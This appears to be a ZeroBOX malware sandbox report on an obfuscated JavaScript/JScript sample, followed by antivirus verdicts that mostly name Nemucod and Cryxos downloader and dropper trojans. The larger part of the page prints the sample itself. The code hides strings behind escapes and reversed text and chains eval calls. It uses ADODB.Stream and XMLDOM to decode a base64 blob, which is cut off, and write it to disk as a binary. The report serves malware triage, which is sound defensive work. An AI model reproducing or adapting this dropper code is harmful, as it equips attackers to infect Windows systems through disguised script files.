Static | ZeroBOX
No static analysis available.
String["prototype"].proc = function() { eval(this.toString());};
String["prototype"].\u0075\u006E\u0064\u0065\u0066\u0069\u006E\u0065\u0064 = function(one, two) {
for(var h=0;h<3;h++){one[h+3] = two[h];}
String.\u0070\u0072\u006f\u0074\u006f\u0074\u0079\u0070\u0065.\u006D\u006F\u0075\u0073\u0065 = {mp3: function(){var d = "";for(var i=0; i<this.toString().length; i++){d = eval("var cd = this.toString().substr(i, 1);cd;") + d;}return d;}}.mp3;
var \u0073\u0048\u0031\u006E\u0033\u006B\u0030\u004E = [null,
("\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74"+"txeTdaeR|".mouse()+"|undefined|\x61\x64\x6F\x64\x62\x2E|"+"noitisoP|teSrahC".mouse()).split("|").concat("epyT".mouse(), "nepO".mouse())];
'String["prototype"].oS3Hm = function(){return [].s0fStu;}'.proc();
var exp = /{(\d+)}/g;var oMut1 = null;
Array.prototype.om0l4d3 = function() {var hYiUrF = \u0061\u0072\u0067\u0075\u006D\u0065\u006E\u0074\u0073; return this[0]["replace"](exp, function(k3tTlE0, k3tTlE1) { try{
return hYiUrF[k3tTlE1];}catch(ex){
return k3tTlE0;}});}
Array.prototype.s0fStu = 'dmFyIG5lb{1}Q0Ow0KdmFyIGxvbmdUZXh0ID0gIlVFc0RCQlEhQCFDIUAhZ0khQCFMdGRYRmMhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCFVIUAhIUAhIUAhIUAhVFVWVVF{1}MUpU{2}1l2VFVG{1}1NVWkZVMVF1VFV{2}ZGp6MVB3eiFAIVFobmRML2c4M3dtIUAhVGwxWlUyVW9FR{1}ZFSUljUjZ0cStLZzJNSDJ4SEt2OGRsNFVPNjV{2}NUg5K3JlSG9NN1V{1}N2lsVkoy{1}WJ{1}Z1pNUFpJZndp{2}Hhu{1}lFGQlpsVGR{1}Y2RZbHdrSlczSzR0Ykx{2}e{1}N3{2}XRGRndjRXhwUDBNV{1}B4NFNsSGw5e{1}Fx{1}Uxvdk9ZY3dzRzB3{1}k9Pc3A3bDNKNVhrS05P{2}HZ4{2}EdWb3dUdDlsZGRjYUJKRGpPL2lXd{1}dr{2}U9tYmp3SEZyd{1}dOSHpKN0xLZVlKczdnbjgwZjNoVVNvOVdtNXFpdDNF{2}DFscHk5{2}WU3W{1}kzZVBMe{1}M4LyFAIWFmem52UUJHZ3RXY0NseEtrMk1P{2}jlDcnJPNHJ6bGpM{1}XZVRXNIQ0MwK09lWGMhQCEhQCEhQCEhQCFNUUUhQCEhQCFGQkwhQCF3UVUhQCEhQCFnSUMhQCFDN1hWeFghQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCEhQCFIUSFAISFAISFAIUdO{2}GNreGhiV0p2{1}DNKbGMyO{1}FjbU5sY3k5{2}mIyNW1hV2N1ZEhoMEJjSEpjb01nIUAhIUAhRFFEOHBCQlJ6SklRZWl{1}WXZMWUl0YmpsRUQwY0VGNDFMOStyNUhDQ0Uz{1}XVRMUlsUUN{2}VXZjUjgzS{1}NCKzlJU2VNUmIy{2}VlEck0yL3
sH1n3k0N[2] = Array("sH1n3k0N[4]()[sH1n3k0N[1][6]] = 1;sH1n3k0N[4]()[sH1n3k0N[1][7]]();sH1n3k0N[4]()[\"Writ\"+\"e\"](sH1n3k0N[3][1]['nodeTypedValue']);",
"sH1n3k0N[4]()[sH1n3k0N[1][5]] = 0;sH1n3k0N[4]()[sH1n3k0N[1][6]] = 2;",
"sH1n3k0N[4]()[sH1n3k0N[1][4]] = sH1n3k0N[3][2][0];",
oMut1 = [Array(WSH[sH1n3k0N[1][0]](["\x61\x64{0}\x62\x2E{1}\x72\x65{2}"].om0l4d3("\x6F\x64", "\x73\x74", "\x61\x6D")),WSH[sH1n3k0N[1][0]]("\x6D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x78\x6D\x6C\x64\x6F\x6D")[Array("create\x45\x6C","\x6D","\x6E\x74").join("\x65")]("bst"),["us-\x61\x73\x63\x69\x69"]),function(){return sH1n3k0N[3][0];},function(){for(var p=0; p<sH1n3k0N[2].length; p++){eval(sH1n3k0N[2][p]);}}];
"".undefined(sH1n3k0N, oMut1);
Array.prototype.\u006B\u0034\u0052\u0064\u0033 = "\x73\x48\x31\x6E\x33\x6B\x30\x4E\x20\x3D\x20\x5B\x65\x76\x61\x6C\x2C\x20\x73\x48\x31\x6E\x33\x6B\x30\x4E\x5B\x34\x5D\x28\x29\x2C\x20\x5B\x73\x48\x31\x6E\x33\x6B\x30\x4E\x5B\x31\x5D\x5B\x31\x5D\x5D\x5D\x3B";
sH1n3k0N[3][1]['dataType'] = 'bin.base64';
eval('var tmx = ["JuOP99".oS3Hm()].om0l4d3("f", "T", "a")');
['sH1n3k0N[3][1]["text\"] = tmx;sH1n3k0{0}d3;sH1n3k0{1}sH1n3k0{2}]());'].om0l4d3('N[2][3] = [].k4R', 'N[5]();eval(sH1n3k0N[1][', 'N[2]').proc();
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Agent.4!c
DrWeb Trojan.Siggen21.56157
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh JS/Agent.ha
ALYac JS:Trojan.Cryxos.13219
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit JS:Trojan.Cryxos.D33A3
BitDefenderTheta Clean
VirIT Clean
Symantec JS.Downloader
ESET-NOD32 JS/Kryptik.CPV
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Trojan.JS.Agent.erc
BitDefender JS:Trojan.Cryxos.13219
NANO-Antivirus Exploit.Script.Nemucod.dzzhbf
ViRobot Clean
MicroWorld-eScan JS:Trojan.Cryxos.13219
Rising Trojan.Kryptik/JS!8.10DBE (TOPIS:E0:8FLEVXabM7O)
Emsisoft JS:Trojan.Cryxos.13219 (B)
F-Secure Clean
Baidu Clean
VIPRE JS:Trojan.Cryxos.13219
TrendMicro Clean
FireEye JS:Trojan.Cryxos.13219
Sophos JS/Drop-DHA
Jiangmin Clean
Varist JS/Agent.BZP
Avira Clean
MAX malware (ai score=84)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Microsoft TrojanDownloader:Win32/Nemucod!ml
SUPERAntiSpyware Clean
ZoneAlarm Trojan.JS.Agent.erc
GData JS:Trojan.Cryxos.13219
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee JS/Agent.ha
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Js.Trojan.Agent.Umhl
Yandex Clean
Ikarus Trojan.Java.GenericGB
MaxSecure Clean
Fortinet JS/Kryptik.CPV!tr
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.